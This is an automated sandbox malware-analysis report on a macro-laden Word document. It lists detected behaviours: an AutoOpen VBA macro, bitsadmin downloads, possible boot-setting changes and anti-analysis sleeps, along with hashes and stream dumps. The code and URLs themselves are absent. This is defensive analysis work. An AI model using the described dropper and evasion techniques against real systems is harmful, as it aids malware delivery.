Analysis Report
Overview
General Information |
---|
Joe Sandbox Version: | 17.0.0 |
Analysis ID: | 204881 |
Start time: | 17:34:12 |
Joe Sandbox Product: | Cloud |
Start date: | 12.01.2017 |
Overall analysis duration: | 0h 5m 29s |
Report type: | full |
Sample file name: | 2e374756930bee59c371d98ff88572a8.doc |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 (Office 2013 v14, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies |
|
Detection: | MAL |
Classification: | mal64.evad.expl.winDOC@7/12@0/0 |
HCA Information: |
|
EGA Information: | Failed |
Cookbook Comments: |
|
Warnings: | Show All
|
Detection |
---|
Strategy | Score | Range | Reporting | Detection | |
---|---|---|---|---|---|
Threshold | 64 | 0 - 100 | Report FP / FN |
Confidence |
---|
Strategy | Score | Range | Further Analysis Required? | Confidence | |
---|---|---|---|---|---|
Threshold | 5 | 0 - 5 | false |
Classification |
---|
Analysis Advice |
---|
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook |
Signature Overview |
---|
Click to jump to signature section
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: |
Networking: |
---|
Urls found in memory or binary data | Show sources |
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: MSOSQM.EXE | String found in binary or memory: | ||
Source: MSOSQM.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: bitsadmin.exe | String found in binary or memory: | ||
Source: cmd.exe | String found in binary or memory: | ||
Source: bitsadmin.exe | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: 2e374756930bee59c371d98ff88572a8.doc | String found in binary or memory: | ||
Source: WINWORD.EXE, 2e374756930bee59c371d98ff88572a8.doc | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr | String found in binary or memory: |
Downloads files | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Found strings which match to known social media urls | Show sources |
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: |
Persistence and Installation Behavior: |
---|
May use bcdedit to modify the Windows boot settings | Show sources |
Source: cmd.exe | Binary or memory string: |
Tries to download files via bitsadmin | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
Data Obfuscation: |
---|
Document contains an embedded VBA with many randomly named variables | Show sources |
Source: 2e374756930bee59c371d98ff88572a8.doc | Stream path 'Macros/VBA/NewMacros' : |
System Summary: |
---|
Checks whether correct version of .NET is installed | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Found graphical window changes (likely an installer) | Show sources |
Source: Window Recorder | Window detected: |
Checks if Microsoft Office is installed | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Uses new MSVCR Dlls | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File opened: |
Classification label | Show sources |
Source: classification engine | Classification label: |
Creates files inside the user directory | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Creates temporary files | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Document contains an OLE Word Document stream indicating a Microsoft Word file | Show sources |
Source: 2e374756930bee59c371d98ff88572a8.doc | OLE indicator, Word Document stream: |
Document contains summary information with irregular field values | Show sources |
Source: 2e374756930bee59c371d98ff88572a8.doc | OLE document summary: |
Found command line output | Show sources |
Source: C:\Windows\System32\cmd.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: | ||
Source: C:\Windows\System32\bitsadmin.exe | Console Write: |
Reads ini files | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File read: |
Reads software policies | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Spawns processes | Show sources |
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
Uses an in-process (OLE) Automation server | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Document contains embedded VBA macros | Show sources |
Source: 2e374756930bee59c371d98ff88572a8.doc | OLE indicator, VBA macros: |
Reads the hosts file | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File read: |
Document contains an embedded VBA macro which executes code when the document is opened / closed | Show sources |
Source: 2e374756930bee59c371d98ff88572a8.doc | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: AutoOpen |
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: 2e374756930bee59c371d98ff88572a8.doc | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: AutoOpen |
Document contains an embedded VBA macro with suspicious strings | Show sources |
Source: 2e374756930bee59c371d98ff88572a8.doc | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: MJCTM |
Anti Debugging: |
---|
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) | Show sources |
Source: C:\Windows\System32\bitsadmin.exe | System information queried: |
Malware Analysis System Evasion: |
---|
Checks the free space of harddrives | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File Volume queried: | ||
Source: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE | File Volume queried: | ||
Source: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE | File Volume queried: |
May sleep (evasive loops) to hinder dynamic analysis | Show sources |
Source: C:\Windows\System32\bitsadmin.exe TID: 3684 | Thread sleep time: |
Hooking and other Techniques for Hiding and Protection: |
---|
Disables application error messsages (SetErrorMode) | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process information set: | ||
Source: C:\Windows\System32\cmd.exe | Process information set: | ||
Source: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE | Process information set: |
Document contains OLE streams with high entropy indicating encrypted embedded content | Show sources |
Source: 2e374756930bee59c371d98ff88572a8.doc | Stream path 'Data' entropy: |
Language, Device and Operating System Detection: |
---|
Queries the cryptographic machine GUID | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Queries the volume information (name, serial number etc) of a device | Show sources |
Source: C:\Windows\System32\cmd.exe | Queries volume information: |
Queries time zone information | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Behavior Graph |
---|
Yara Overview |
---|
No Yara matches |
---|
Screenshot |
---|
Startup |
---|
|
Created / dropped Files |
---|
File Path | Type and Hashes |
---|---|
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
|
Contacted Domains/Contacted IPs |
---|
Static File Info |
---|
General | |
---|---|
File type: | 0 |
TrID: |
|
File name: | 2e374756930bee59c371d98ff88572a8.doc |
File size: | 119808 |
MD5: | 2e374756930bee59c371d98ff88572a8 |
SHA1: | c5f3fd7570bd32edc44795a92c59965b4d9bbc08 |
SHA256: | 115c18d207694542dad0e876a36f1a64447a45fa2f78a0254f75799122810922 |
SHA512: | 7a2eb7d8d8fc9be26fcf3f4e95ffc794f371e1f7984c64536469f51c4d1f27c1a9734254cfd0942fcf86209a03152a4b2d05802a17be5b23cfcf4a239d099fa9 |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "2e374756930bee59c371d98ff88572a8.doc" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Office Word |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Title: | |
Subject: | |
Author: | admin |
Keywords: | |
Comments: | |
Template: | Normal.dot |
Last Saved By: | dood |
Revion Number: | 31 |
Total Edit Time: | 4860 |
Create Time: | 2016-08-03 20:27:00 |
Last Saved Time: | 2016-09-21 11:55:00 |
Number of Pages: | 1 |
Number of Words: | 102 |
Number of Characters: | 586 |
Creating Application: | Microsoft Office Word |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Number of Lines: | 4 |
Number of Paragraphs: | 1 |
Thumbnail Scaling Desired: | False |
Company: | NhT |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 730895 |
Streams with VBA |
---|
VBA File Name: NewMacros.bas, Stream Size: 8792 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/NewMacros |
VBA File Name: | NewMacros.bas |
Stream Size: | 8792 |
Data ASCII: | . . . . . . . . . d . . . . . . . . . . . . . . . k . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 64 08 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6b 08 00 00 13 19 00 00 00 00 00 00 01 00 00 00 96 d5 ea 28 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
VBA File Name: ThisDocument.cls, Stream Size: 924 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 924 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 9e 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff a5 02 00 00 f9 02 00 00 00 00 00 00 01 00 00 00 96 d5 a8 c2 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 113 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 113 |
Entropy: | 4.34494072836 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . M i c r o s o f t O f f i c e W o r d . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 c4 ee ea f3 ec e5 ed f2 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: \x5DocumentSummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | FoxPro FPT, blocks size 512, next free block index 4278124544 |
Stream Size: | 4096 |
Entropy: | 0.508296801708 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . D . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N h T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 01 00 00 ec 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | FoxPro FPT, blocks size 512, next free block index 4278124544 |
Stream Size: | 4096 |
Entropy: | 0.464316040624 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a d m i n . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00 |
Stream Path: 1Table, File Type: FoxPro FPT, blocks size 256, next free block index 2248282368, Stream Size: 7198 |
---|
General | |
---|---|
Stream Path: | 1Table |
File Type: | FoxPro FPT, blocks size 256, next free block index 2248282368 |
Stream Size: | 7198 |
Entropy: | 3.07205149777 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 86 02 11 00 12 00 01 00 9c 00 0f 00 04 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: Data, File Type: data, Stream Size: 74220 |
---|
General | |
---|---|
Stream Path: | Data |
File Type: | data |
Stream Size: | 74220 |
Entropy: | 7.9301420367 |
Base64 Encoded: | True |
Data ASCII: | . . . . D . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . C . . . : . . . . A . . . . . . " . . . . . . . . . . . . . . . m . i . c . r . o . s . o . f . t . _ . o . f . f . i . c . e . . . . . . . . . . . . . . . b . . . m . . . . . R . o x = . . . j B 4 . . . s . . . I . . . . . . . D . . . . . D . . n . . A . . . R . o x = . . . j B 4 . . . s . . . P N G . . . . . . . . I H D R . |
Data Raw: | 1f 13 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 0c 1a 04 e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 5e 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 3a 00 00 00 04 41 01 00 00 00 05 c1 22 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 6d 00 69 00 |
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 485 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 485 |
Entropy: | 5.23409240996 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . H e l p F i l e = " " . . N a m e = " s d g s d g s d g e r g h e g e " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 0 9 2 3 C 3 A 4 0 3 A 4 0 3 E 4 4 3 E 4 4 " . . D P B = " 2 0 2 2 8 C D 3 A 9 D 3 A 9 2 C 5 7 D 4 A 9 1 6 8 F C 1 0 5 0 4 5 A |
Data Raw: | 49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 73 64 67 73 64 67 73 64 67 65 72 67 |
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECTwm |
File Type: | data |
Stream Size: | 71 |
Entropy: | 3.34859995248 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00 |
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4210 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 4210 |
Entropy: | 4.90815306169 |
Base64 Encoded: | False |
